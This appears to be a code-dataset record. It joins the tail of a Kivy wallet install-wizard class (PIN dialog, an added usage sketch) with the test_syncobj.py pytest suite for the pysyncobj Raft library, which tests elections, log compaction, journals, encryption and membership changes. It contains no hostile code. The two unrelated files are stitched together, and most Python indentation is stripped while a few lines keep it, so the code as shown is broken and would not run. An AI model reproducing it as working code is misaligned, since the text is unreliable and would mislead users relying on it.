# do not request PIN for watching-only wallets
run_next(None, False)
return
def on_success(old_pin, pin):
assert old_pin is None
run_next(pin, False)
def on_failure():
self.show_error(_('PIN mismatch'))
self.run('request_password', run_next)
popup = PasswordDialog()
app = App.get_running_app()
popup.init(app, None, _('Choose PIN code'), on_success, on_failure, is_change=2)
popup.open()
def action_dialog(self, action, run_next):
f = getattr(self, action)
f()
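# --- Editor's usage sketch (not part of the original file) ------------------
# Hedged illustration of how a caller might use InstallWizard.waiting_dialog:
# the task runs in a background thread while an info bubble is shown, and
# on_finished is scheduled back on the Kivy main loop. `wizard` and `slow_task`
# are placeholders, not names from the original code base.
def _example_waiting_dialog(wizard, slow_task):
    def done():
        wizard.show_message(_("Task finished"))
    wizard.waiting_dialog(slow_task, msg=_("Please wait..."), on_finished=done)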
|
test_syncobj.py
|
from __future__ import print_function
import os
import time
import pytest
import random
import threading
import sys
import pysyncobj.pickle as pickle
import pysyncobj.dns_resolver as dns_resolver
import platform
if sys.version_info >= (3, 0):
xrange = range
from functools import partial
import functools
import struct
import logging
from pysyncobj import SyncObj, SyncObjConf, replicated, FAIL_REASON, _COMMAND_TYPE, \
createJournal, HAS_CRYPTO, replicated_sync, SyncObjException, SyncObjConsumer, _RAFT_STATE
from pysyncobj.syncobj_admin import executeAdminCommand
from pysyncobj.batteries import ReplCounter, ReplList, ReplDict, ReplSet, ReplLockManager, ReplQueue, ReplPriorityQueue
from pysyncobj.node import TCPNode
from collections import defaultdict
logging.basicConfig(format=u'[%(asctime)s %(filename)s:%(lineno)d %(levelname)s] %(message)s', level=logging.DEBUG)
_bchr = functools.partial(struct.pack, 'B')
class TEST_TYPE:
DEFAULT = 0
COMPACTION_1 = 1
COMPACTION_2 = 2
RAND_1 = 3
JOURNAL_1 = 4
AUTO_TICK_1 = 5
WAIT_BIND = 6
LARGE_COMMAND = 7
class TestObj(SyncObj):
def __init__(self, selfNodeAddr, otherNodeAddrs,
testType=TEST_TYPE.DEFAULT,
compactionMinEntries=0,
dumpFile=None,
journalFile=None,
password=None,
dynamicMembershipChange=False,
useFork=True,
testBindAddr=False,
consumers=None,
onStateChanged=None,
leaderFallbackTimeout=None):
cfg = SyncObjConf(autoTick=False, appendEntriesUseBatch=False)
cfg.appendEntriesPeriod = 0.1
cfg.raftMinTimeout = 0.5
cfg.raftMaxTimeout = 1.0
cfg.dynamicMembershipChange = dynamicMembershipChange
cfg.onStateChanged = onStateChanged
if leaderFallbackTimeout is not None:
cfg.leaderFallbackTimeout = leaderFallbackTimeout
if testBindAddr:
cfg.bindAddress = selfNodeAddr
if dumpFile is not None:
cfg.fullDumpFile = dumpFile
if password is not None:
cfg.password = password
cfg.useFork = useFork
if testType == TEST_TYPE.COMPACTION_1:
cfg.logCompactionMinEntries = compactionMinEntries
cfg.logCompactionMinTime = 0.1
cfg.appendEntriesUseBatch = True
if testType == TEST_TYPE.COMPACTION_2:
cfg.logCompactionMinEntries = 99999
cfg.logCompactionMinTime = 99999
cfg.fullDumpFile = dumpFile
if testType == TEST_TYPE.LARGE_COMMAND:
cfg.connectionTimeout = 15.0
cfg.logCompactionMinEntries = 99999
cfg.logCompactionMinTime = 99999
cfg.fullDumpFile = dumpFile
cfg.raftMinTimeout = 1.5
cfg.raftMaxTimeout = 2.5
# cfg.appendEntriesBatchSizeBytes = 2 ** 13
if testType == TEST_TYPE.RAND_1:
cfg.autoTickPeriod = 0.05
cfg.appendEntriesPeriod = 0.02
cfg.raftMinTimeout = 0.1
cfg.raftMaxTimeout = 0.2
cfg.logCompactionMinTime = 9999999
cfg.logCompactionMinEntries = 9999999
cfg.journalFile = journalFile
if testType == TEST_TYPE.JOURNAL_1:
cfg.logCompactionMinTime = 999999
cfg.logCompactionMinEntries = 999999
cfg.fullDumpFile = dumpFile
cfg.journalFile = journalFile
if testType == TEST_TYPE.AUTO_TICK_1:
cfg.autoTick = True
cfg.pollerType = 'select'
if testType == TEST_TYPE.WAIT_BIND:
cfg.maxBindRetries = 1
cfg.autoTick = True
super(TestObj, self).__init__(selfNodeAddr, otherNodeAddrs, cfg, consumers)
self.__counter = 0
self.__data = {}
@replicated
def addValue(self, value):
self.__counter += value
return self.__counter
@replicated
def addKeyValue(self, key, value):
self.__data[key] = value
@replicated_sync
def addValueSync(self, value):
self.__counter += value
return self.__counter
@replicated
def testMethod(self):
self.__data['testKey'] = 'valueVer1'
@replicated(ver=1)
def testMethod(self):
self.__data['testKey'] = 'valueVer2'
def getCounter(self):
return self.__counter
def getValue(self, key):
return self.__data.get(key, None)
def dumpKeys(self):
print('keys:', sorted(self.__data.keys()))
def singleTickFunc(o, timeToTick, interval, stopFunc):
currTime = time.time()
finishTime = currTime + timeToTick
while time.time() < finishTime:
o._onTick(interval)
if stopFunc is not None:
if stopFunc():
break
def utilityTickFunc(args, currRes, key):
currRes[key] = executeAdminCommand(args)
def doSyncObjAdminTicks(objects, arguments, timeToTick, currRes, interval=0.05, stopFunc=None):
objThreads = []
utilityThreads = []
for o in objects:
t1 = threading.Thread(target=singleTickFunc, args=(o, timeToTick, interval, stopFunc))
t1.start()
objThreads.append(t1)
if arguments.get(o) is not None:
t2 = threading.Thread(target=utilityTickFunc, args=(arguments[o], currRes, o))
t2.start()
utilityThreads.append(t2)
for t in objThreads:
t.join()
for t in utilityThreads:
t.join()
def doTicks(objects, timeToTick, interval=0.05, stopFunc=None):
threads = []
for o in objects:
t = threading.Thread(target=singleTickFunc, args=(o, timeToTick, interval, stopFunc))
t.start()
threads.append(t)
for t in threads:
t.join()
def doAutoTicks(interval=0.05, stopFunc=None):
deadline = time.time() + interval
while not stopFunc():
time.sleep(0.02)
t2 = time.time()
if t2 >= deadline:
break
_g_nextAddress = 6000 + 60 * (int(time.time()) % 600)
def getNextAddr(ipv6=False, isLocalhost=False):
global _g_nextAddress
_g_nextAddress += 1
if ipv6:
return '::1:%d' % _g_nextAddress
if isLocalhost:
return 'localhost:%d' % _g_nextAddress
return '127.0.0.1:%d' % _g_nextAddress
_g_nextDumpFile = 1
_g_nextJournalFile = 1
def getNextDumpFile():
global _g_nextDumpFile
fname = 'dump%d.bin' % _g_nextDumpFile
_g_nextDumpFile += 1
return fname
def getNextJournalFile():
global _g_nextJournalFile
fname = 'journal%d.bin' % _g_nextJournalFile
_g_nextJournalFile += 1
return fname
def test_syncTwoObjects():
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]])
o2 = TestObj(a[1], [a[0]])
objs = [o1, o2]
assert not o1._isReady()
assert not o2._isReady()
doTicks(objs, 10.0, stopFunc=lambda: o1._isReady() and o2._isReady())
o1.waitBinded()
o2.waitBinded()
o1._printStatus()
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1._isReady()
assert o2._isReady()
o1.addValue(150)
o2.addValue(200)
doTicks(objs, 10.0, stopFunc=lambda: o1.getCounter() == 350 and o2.getCounter() == 350)
assert o1._isReady()
assert o2._isReady()
assert o1.getCounter() == 350
assert o2.getCounter() == 350
o1._destroy()
o2._destroy()
def test_singleObject():
random.seed(42)
a = [getNextAddr(), ]
o1 = TestObj(a[0], [])
objs = [o1, ]
assert not o1._isReady()
doTicks(objs, 3.0, stopFunc=lambda: o1._isReady())
o1._printStatus()
assert o1._getLeader().address in a
assert o1._isReady()
o1.addValue(150)
o1.addValue(200)
doTicks(objs, 3.0, stopFunc=lambda: o1.getCounter() == 350)
assert o1._isReady()
assert o1.getCounter() == 350
o1._destroy()
def test_syncThreeObjectsLeaderFail():
random.seed(12)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
states = defaultdict(list)
o1 = TestObj(a[0], [a[1], a[2]], testBindAddr=True, onStateChanged=lambda old, new: states[a[0]].append(new))
o2 = TestObj(a[1], [a[2], a[0]], testBindAddr=True, onStateChanged=lambda old, new: states[a[1]].append(new))
o3 = TestObj(a[2], [a[0], a[1]], testBindAddr=True, onStateChanged=lambda old, new: states[a[2]].append(new))
objs = [o1, o2, o3]
assert not o1._isReady()
assert not o2._isReady()
assert not o3._isReady()
doTicks(objs, 10.0, stopFunc=lambda: o1._isReady() and o2._isReady() and o3._isReady())
assert o1._isReady()
assert o2._isReady()
assert o3._isReady()
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1._getLeader() == o3._getLeader()
assert _RAFT_STATE.LEADER in states[o1._getLeader().address]
o1.addValue(150)
o2.addValue(200)
doTicks(objs, 10.0, stopFunc=lambda: o3.getCounter() == 350)
assert o3.getCounter() == 350
prevLeader = o1._getLeader()
newObjs = [o for o in objs if o._SyncObj__selfNode != prevLeader]
assert len(newObjs) == 2
doTicks(newObjs, 10.0, stopFunc=lambda: newObjs[0]._getLeader() != prevLeader and \
newObjs[0]._getLeader() is not None and \
newObjs[0]._getLeader().address in a and \
newObjs[0]._getLeader() == newObjs[1]._getLeader())
assert newObjs[0]._getLeader() != prevLeader
assert newObjs[0]._getLeader().address in a
assert newObjs[0]._getLeader() == newObjs[1]._getLeader()
assert _RAFT_STATE.LEADER in states[newObjs[0]._getLeader().address]
newObjs[1].addValue(50)
doTicks(newObjs, 10, stopFunc=lambda: newObjs[0].getCounter() == 400)
assert newObjs[0].getCounter() == 400
doTicks(objs, 10.0, stopFunc=lambda: sum([int(o.getCounter() == 400) for o in objs]) == len(objs))
for o in objs:
assert o.getCounter() == 400
o1._destroy()
o2._destroy()
o3._destroy()
def test_manyActionsLogCompaction():
random.seed(42)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1], a[2]], TEST_TYPE.COMPACTION_1, compactionMinEntries=100)
o2 = TestObj(a[1], [a[2], a[0]], TEST_TYPE.COMPACTION_1, compactionMinEntries=100)
o3 = TestObj(a[2], [a[0], a[1]], TEST_TYPE.COMPACTION_1, compactionMinEntries=100)
objs = [o1, o2, o3]
assert not o1._isReady()
assert not o2._isReady()
assert not o3._isReady()
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady() and o3._isReady())
assert o1._isReady()
assert o2._isReady()
assert o3._isReady()
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1._getLeader() == o3._getLeader()
for i in xrange(0, 500):
o1.addValue(1)
o2.addValue(1)
doTicks(objs, 10, stopFunc=lambda: o1.getCounter() == 1000 and \
o2.getCounter() == 1000 and \
o3.getCounter() == 1000)
assert o1.getCounter() == 1000
assert o2.getCounter() == 1000
assert o3.getCounter() == 1000
assert o1._getRaftLogSize() <= 100
assert o2._getRaftLogSize() <= 100
assert o3._getRaftLogSize() <= 100
newObjs = [o1, o2]
doTicks(newObjs, 10, stopFunc=lambda: o3._getLeader() is None)
for i in xrange(0, 500):
o1.addValue(1)
o2.addValue(1)
doTicks(newObjs, 10, stopFunc=lambda: o1.getCounter() == 2000 and \
o2.getCounter() == 2000)
assert o1.getCounter() == 2000
assert o2.getCounter() == 2000
assert o3.getCounter() != 2000
doTicks(objs, 10, stopFunc=lambda: o3.getCounter() == 2000)
assert o3.getCounter() == 2000
assert o1._getRaftLogSize() <= 100
assert o2._getRaftLogSize() <= 100
assert o3._getRaftLogSize() <= 100
o1._destroy()
o2._destroy()
o3._destroy()
def onAddValue(res, err, info):
assert res == 3
assert err == FAIL_REASON.SUCCESS
info['callback'] = True
def test_checkCallbacksSimple():
random.seed(42)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1], a[2]])
o2 = TestObj(a[1], [a[2], a[0]])
o3 = TestObj(a[2], [a[0], a[1]])
objs = [o1, o2, o3]
assert not o1._isReady()
assert not o2._isReady()
assert not o3._isReady()
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady() and o3._isReady())
assert o1._isReady()
assert o2._isReady()
assert o3._isReady()
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1._getLeader() == o3._getLeader()
callbackInfo = {
'callback': False
}
o1.addValue(3, callback=partial(onAddValue, info=callbackInfo))
doTicks(objs, 10, stopFunc=lambda: o2.getCounter() == 3 and callbackInfo['callback'] == True)
assert o2.getCounter() == 3
assert callbackInfo['callback'] == True
o1._destroy()
o2._destroy()
o3._destroy()
def removeFiles(files):
for f in (files):
if os.path.isfile(f):
for i in xrange(0, 15):
try:
if os.path.isfile(f):
os.remove(f)
break
else:
break
except:
time.sleep(1.0)
def checkDumpToFile(useFork):
dumpFiles = [getNextDumpFile(), getNextDumpFile()]
removeFiles(dumpFiles)
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.COMPACTION_2, dumpFile=dumpFiles[0], useFork=useFork)
o2 = TestObj(a[1], [a[0]], TEST_TYPE.COMPACTION_2, dumpFile=dumpFiles[1], useFork=useFork)
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
o1.addValue(150)
o2.addValue(200)
doTicks(objs, 10, stopFunc=lambda: o1.getCounter() == 350 and o2.getCounter() == 350)
assert o1.getCounter() == 350
assert o2.getCounter() == 350
o1._forceLogCompaction()
o2._forceLogCompaction()
doTicks(objs, 1.5)
o1._destroy()
o2._destroy()
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.COMPACTION_2, dumpFile=dumpFiles[0], useFork=useFork)
o2 = TestObj(a[1], [a[0]], TEST_TYPE.COMPACTION_2, dumpFile=dumpFiles[1], useFork=useFork)
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._isReady()
assert o2._isReady()
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1.getCounter() == 350
assert o2.getCounter() == 350
o1._destroy()
o2._destroy()
removeFiles(dumpFiles)
def test_checkDumpToFile():
if hasattr(os, 'fork'):
checkDumpToFile(True)
checkDumpToFile(False)
def getRandStr():
return '%0100000x' % random.randrange(16 ** 100000)
def test_checkBigStorage():
dumpFiles = [getNextDumpFile(), getNextDumpFile()]
removeFiles(dumpFiles)
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.COMPACTION_2, dumpFile=dumpFiles[0])
o2 = TestObj(a[1], [a[0]], TEST_TYPE.COMPACTION_2, dumpFile=dumpFiles[1])
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
# Store ~50Mb data.
testRandStr = getRandStr()
for i in xrange(0, 500):
o1.addKeyValue(i, getRandStr())
o1.addKeyValue('test', testRandStr)
# Wait for replication.
doTicks(objs, 60, stopFunc=lambda: o1.getValue('test') == testRandStr and \
o2.getValue('test') == testRandStr)
assert o1.getValue('test') == testRandStr
o1._forceLogCompaction()
o2._forceLogCompaction()
# Wait for disk dump
doTicks(objs, 8.0)
o1._destroy()
o2._destroy()
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.COMPACTION_2, dumpFile=dumpFiles[0])
o2 = TestObj(a[1], [a[0]], TEST_TYPE.COMPACTION_2, dumpFile=dumpFiles[1])
objs = [o1, o2]
# Wait for disk load, election and replication
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1.getValue('test') == testRandStr
assert o2.getValue('test') == testRandStr
o1._destroy()
o2._destroy()
removeFiles(dumpFiles)
@pytest.mark.skipif(sys.platform == "win32" or platform.python_implementation() != 'CPython', reason="does not run on windows or pypy")
def test_encryptionCorrectPassword():
assert HAS_CRYPTO
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], password='asd')
o2 = TestObj(a[1], [a[0]], password='asd')
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
o1.addValue(150)
o2.addValue(200)
doTicks(objs, 10, stopFunc=lambda: o1.getCounter() == 350 and o2.getCounter() == 350)
assert o1.getCounter() == 350
assert o2.getCounter() == 350
for conn in list(o1._SyncObj__transport._connections.values()) + list(o2._SyncObj__transport._connections.values()):
conn.disconnect()
doTicks(objs, 10)
o1.addValue(100)
doTicks(objs, 10, stopFunc=lambda: o1.getCounter() == 450 and o2.getCounter() == 450)
assert o1.getCounter() == 450
assert o2.getCounter() == 450
o1._destroy()
o2._destroy()
@pytest.mark.skipif(platform.python_implementation() != 'CPython', reason="does not have crypto on pypy")
def test_encryptionWrongPassword():
assert HAS_CRYPTO
random.seed(12)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1], a[2]], password='asd')
o2 = TestObj(a[1], [a[2], a[0]], password='asd')
o3 = TestObj(a[2], [a[0], a[1]], password='qwe')
objs = [o1, o2, o3]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
doTicks(objs, 1.0)
assert o3._getLeader() is None
o1._destroy()
o2._destroy()
o3._destroy()
def _checkSameLeader(objs):
for obj1 in objs:
l1 = obj1._getLeader()
if l1 != obj1._SyncObj__selfNode:
continue
t1 = obj1._getTerm()
for obj2 in objs:
l2 = obj2._getLeader()
if l2 != obj2._SyncObj__selfNode:
continue
if obj2._getTerm() != t1:
continue
if l2 != l1:
obj1._printStatus()
obj2._printStatus()
return False
return True
def _checkSameLeader2(objs):
for obj1 in objs:
l1 = obj1._getLeader()
if l1 is None:
continue
t1 = obj1._getTerm()
for obj2 in objs:
l2 = obj2._getLeader()
if l2 is None:
continue
if obj2._getTerm() != t1:
continue
if l2 != l1:
obj1._printStatus()
obj2._printStatus()
return False
return True
def test_randomTest1():
journalFiles = [getNextJournalFile(), getNextJournalFile(), getNextJournalFile()]
removeFiles(journalFiles)
removeFiles([e + '.meta' for e in journalFiles])
random.seed(12)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1], a[2]], TEST_TYPE.RAND_1, journalFile=journalFiles[0])
o2 = TestObj(a[1], [a[2], a[0]], TEST_TYPE.RAND_1, journalFile=journalFiles[1])
o3 = TestObj(a[2], [a[0], a[1]], TEST_TYPE.RAND_1, journalFile=journalFiles[2])
objs = [o1, o2, o3]
st = time.time()
while time.time() - st < 120.0:
doTicks(objs, random.random() * 0.3, interval=0.05)
assert _checkSameLeader(objs)
assert _checkSameLeader2(objs)
for i in xrange(0, random.randint(0, 2)):
random.choice(objs).addValue(random.randint(0, 10))
newObjs = list(objs)
newObjs.pop(random.randint(0, len(newObjs) - 1))
doTicks(newObjs, random.random() * 0.3, interval=0.05)
assert _checkSameLeader(objs)
assert _checkSameLeader2(objs)
for i in xrange(0, random.randint(0, 2)):
random.choice(objs).addValue(random.randint(0, 10))
if not (o1.getCounter() == o2.getCounter() == o3.getCounter()):
print(time.time(), 'counters:', o1.getCounter(), o2.getCounter(), o3.getCounter())
st = time.time()
while not (o1.getCounter() == o2.getCounter() == o3.getCounter()):
doTicks(objs, 2.0, interval=0.05)
if time.time() - st > 30:
break
if not (o1.getCounter() == o2.getCounter() == o3.getCounter()):
o1._printStatus()
o2._printStatus()
o3._printStatus()
print('Logs same:', o1._SyncObj__raftLog == o2._SyncObj__raftLog == o3._SyncObj__raftLog)
print(time.time(), 'counters:', o1.getCounter(), o2.getCounter(), o3.getCounter())
raise AssertionError('Values not equal')
counter = o1.getCounter()
o1._destroy()
o2._destroy()
o3._destroy()
del o1
del o2
del o3
time.sleep(0.1)
o1 = TestObj(a[0], [a[1], a[2]], TEST_TYPE.RAND_1, journalFile=journalFiles[0])
o2 = TestObj(a[1], [a[2], a[0]], TEST_TYPE.RAND_1, journalFile=journalFiles[1])
o3 = TestObj(a[2], [a[0], a[1]], TEST_TYPE.RAND_1, journalFile=journalFiles[2])
objs = [o1, o2, o3]
st = time.time()
while not (o1.getCounter() == o2.getCounter() == o3.getCounter() == counter):
doTicks(objs, 2.0, interval=0.05)
if time.time() - st > 30:
break
if not (o1.getCounter() == o2.getCounter() == o3.getCounter() >= counter):
o1._printStatus()
o2._printStatus()
o3._printStatus()
print('Logs same:', o1._SyncObj__raftLog == o2._SyncObj__raftLog == o3._SyncObj__raftLog)
print(time.time(), 'counters:', o1.getCounter(), o2.getCounter(), o3.getCounter(), counter)
raise AssertionError('Values not equal')
removeFiles(journalFiles)
removeFiles([e + '.meta' for e in journalFiles])
# Ensure that raftLog after serialization is the same as in serialized data
def test_logCompactionRegressionTest1():
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]])
o2 = TestObj(a[1], [a[0]])
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
o1._forceLogCompaction()
doTicks(objs, 0.5)
assert o1._SyncObj__forceLogCompaction == False
logAfterCompaction = o1._SyncObj__raftLog
o1._SyncObj__loadDumpFile(True)
logAfterDeserialize = o1._SyncObj__raftLog
assert logAfterCompaction == logAfterDeserialize
o1._destroy()
o2._destroy()
def test_logCompactionRegressionTest2():
dumpFiles = [getNextDumpFile(), getNextDumpFile(), getNextDumpFile()]
removeFiles(dumpFiles)
random.seed(12)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1], a[2]], dumpFile=dumpFiles[0])
o2 = TestObj(a[1], [a[2], a[0]], dumpFile=dumpFiles[1])
o3 = TestObj(a[2], [a[0], a[1]], dumpFile=dumpFiles[2])
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
objs = [o1, o2, o3]
o1.addValue(2)
o1.addValue(3)
doTicks(objs, 10, stopFunc=lambda: o3.getCounter() == 5)
o3._forceLogCompaction()
doTicks(objs, 0.5)
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader() == o3._getLeader()
o3._destroy()
objs = [o1, o2]
o1.addValue(2)
o1.addValue(3)
doTicks(objs, 0.5)
o1._forceLogCompaction()
o2._forceLogCompaction()
doTicks(objs, 0.5)
o3 = TestObj(a[2], [a[0], a[1]], dumpFile=dumpFiles[2])
objs = [o1, o2, o3]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady() and o3._isReady())
assert o1._isReady()
assert o2._isReady()
assert o3._isReady()
o1._destroy()
o2._destroy()
o3._destroy()
removeFiles(dumpFiles)
def __checkParnerNodeExists(obj, nodeAddr, shouldExist=True):
nodeAddrSet = {node.address for node in obj._SyncObj__otherNodes}
return (
nodeAddr in nodeAddrSet) == shouldExist # either nodeAddr is in nodeAddrSet and shouldExist is True, or nodeAddr isn't in the set and shouldExist is False
def test_doChangeClusterUT1():
dumpFiles = [getNextDumpFile()]
removeFiles(dumpFiles)
baseAddr = getNextAddr()
oterAddr = getNextAddr()
o1 = TestObj(baseAddr, ['localhost:1235', oterAddr], dumpFile=dumpFiles[0], dynamicMembershipChange=True)
    assert __checkParnerNodeExists(o1, 'localhost:1238', False)
    assert __checkParnerNodeExists(o1, 'localhost:1239', False)
    assert __checkParnerNodeExists(o1, 'localhost:1235', True)
noop = _bchr(_COMMAND_TYPE.NO_OP)
member = _bchr(_COMMAND_TYPE.MEMBERSHIP)
# Check regular configuration change - adding
o1._SyncObj__onMessageReceived(TCPNode('localhost:12345'), {
'type': 'append_entries',
'term': 1,
'prevLogIdx': 1,
'prevLogTerm': 0,
'commit_index': 2,
'entries': [(noop, 2, 1), (noop, 3, 1), (member + pickle.dumps(['add', 'localhost:1238']), 4, 1)]
})
    assert __checkParnerNodeExists(o1, 'localhost:1238', True)
    assert __checkParnerNodeExists(o1, 'localhost:1239', False)
# Check rollback adding
o1._SyncObj__onMessageReceived(TCPNode('localhost:1236'), {
'type': 'append_entries',
'term': 2,
'prevLogIdx': 2,
'prevLogTerm': 1,
'commit_index': 3,
'entries': [(noop, 3, 2), (member + pickle.dumps(['add', 'localhost:1239']), 4, 2)]
})
    assert __checkParnerNodeExists(o1, 'localhost:1238', False)
    assert __checkParnerNodeExists(o1, 'localhost:1239', True)
    assert __checkParnerNodeExists(o1, oterAddr, True)
# Check regular configuration change - removing
o1._SyncObj__onMessageReceived(TCPNode('localhost:1236'), {
'type': 'append_entries',
'term': 2,
'prevLogIdx': 4,
'prevLogTerm': 2,
'commit_index': 4,
'entries': [(member + pickle.dumps(['rem', 'localhost:1235']), 5, 2)]
})
    assert __checkParnerNodeExists(o1, 'localhost:1238', False)
    assert __checkParnerNodeExists(o1, 'localhost:1239', True)
    assert __checkParnerNodeExists(o1, 'localhost:1235', False)
# Check log compaction
o1._forceLogCompaction()
doTicks([o1], 0.5)
o1._destroy()
    o2 = TestObj(oterAddr, [baseAddr, 'localhost:1236'], dumpFile=dumpFiles[0], dynamicMembershipChange=True)
doTicks([o2], 0.5)
    assert __checkParnerNodeExists(o2, oterAddr, False)
    assert __checkParnerNodeExists(o2, baseAddr, True)
    assert __checkParnerNodeExists(o2, 'localhost:1238', False)
    assert __checkParnerNodeExists(o2, 'localhost:1239', True)
    assert __checkParnerNodeExists(o2, 'localhost:1235', False)
o2._destroy()
removeFiles(dumpFiles)
def test_doChangeClusterUT2():
a = [getNextAddr(), getNextAddr(), getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1], a[2]], dynamicMembershipChange=True)
o2 = TestObj(a[1], [a[2], a[0]], dynamicMembershipChange=True)
o3 = TestObj(a[2], [a[0], a[1]], dynamicMembershipChange=True)
doTicks([o1, o2, o3], 10, stopFunc=lambda: o1._isReady() and o2._isReady() and o3._isReady())
assert o1._isReady() == o2._isReady() == o3._isReady() == True
o3.addValue(50)
o2.addNodeToCluster(a[3])
success = False
for i in xrange(10):
doTicks([o1, o2, o3], 0.5)
res = True
res &= __checkParnerNodeExists(o1, a[3], True)
res &= __checkParnerNodeExists(o2, a[3], True)
res &= __checkParnerNodeExists(o3, a[3], True)
if res:
success = True
break
o2.addNodeToCluster(a[3])
assert success
o4 = TestObj(a[3], [a[0], a[1], a[2]], dynamicMembershipChange=True)
doTicks([o1, o2, o3, o4], 10, stopFunc=lambda: o4._isReady())
o1.addValue(450)
doTicks([o1, o2, o3, o4], 10, stopFunc=lambda: o4.getCounter() == 500)
assert o4.getCounter() == 500
o1._destroy()
o2._destroy()
o3._destroy()
o4._destroy()
def test_journalTest1():
dumpFiles = [getNextDumpFile(), getNextDumpFile()]
journalFiles = [getNextJournalFile(), getNextJournalFile()]
removeFiles(dumpFiles)
removeFiles(journalFiles)
removeFiles([e + '.meta' for e in journalFiles])
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[0], journalFile=journalFiles[0])
o2 = TestObj(a[1], [a[0]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[1], journalFile=journalFiles[1])
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
o1.addValue(150)
o2.addValue(200)
doTicks(objs, 10, stopFunc=lambda: o1.getCounter() == 350 and o2.getCounter() == 350)
assert o1.getCounter() == 350
assert o2.getCounter() == 350
o1._destroy()
o2._destroy()
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[0], journalFile=journalFiles[0])
o2 = TestObj(a[1], [a[0]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[1], journalFile=journalFiles[1])
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady() and \
o1.getCounter() == 350 and o2.getCounter() == 350)
assert o1._isReady()
assert o2._isReady()
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1.getCounter() == 350
assert o2.getCounter() == 350
o1.addValue(100)
o2.addValue(150)
doTicks(objs, 10, stopFunc=lambda: o1.getCounter() == 600 and o2.getCounter() == 600)
assert o1.getCounter() == 600
assert o2.getCounter() == 600
o1._forceLogCompaction()
o2._forceLogCompaction()
doTicks(objs, 0.5)
o1.addValue(150)
o2.addValue(150)
doTicks(objs, 10, stopFunc=lambda: o1.getCounter() == 900 and o2.getCounter() == 900)
assert o1.getCounter() == 900
assert o2.getCounter() == 900
o1._destroy()
o2._destroy()
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[0], journalFile=journalFiles[0])
o2 = TestObj(a[1], [a[0]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[1], journalFile=journalFiles[1])
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady() and \
o1.getCounter() == 900 and o2.getCounter() == 900)
assert o1._isReady()
assert o2._isReady()
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1.getCounter() == 900
assert o2.getCounter() == 900
o1._destroy()
o2._destroy()
removeFiles(dumpFiles)
removeFiles(journalFiles)
removeFiles([e + '.meta' for e in journalFiles])
def test_journalTest2():
journalFiles = [getNextJournalFile()]
removeFiles(journalFiles)
removeFiles([e + '.meta' for e in journalFiles])
removeFiles(journalFiles)
journal = createJournal(journalFiles[0])
journal.add(b'cmd1', 1, 0)
journal.add(b'cmd2', 2, 0)
journal.add(b'cmd3', 3, 0)
journal._destroy()
journal = createJournal(journalFiles[0])
assert len(journal) == 3
assert journal[0] == (b'cmd1', 1, 0)
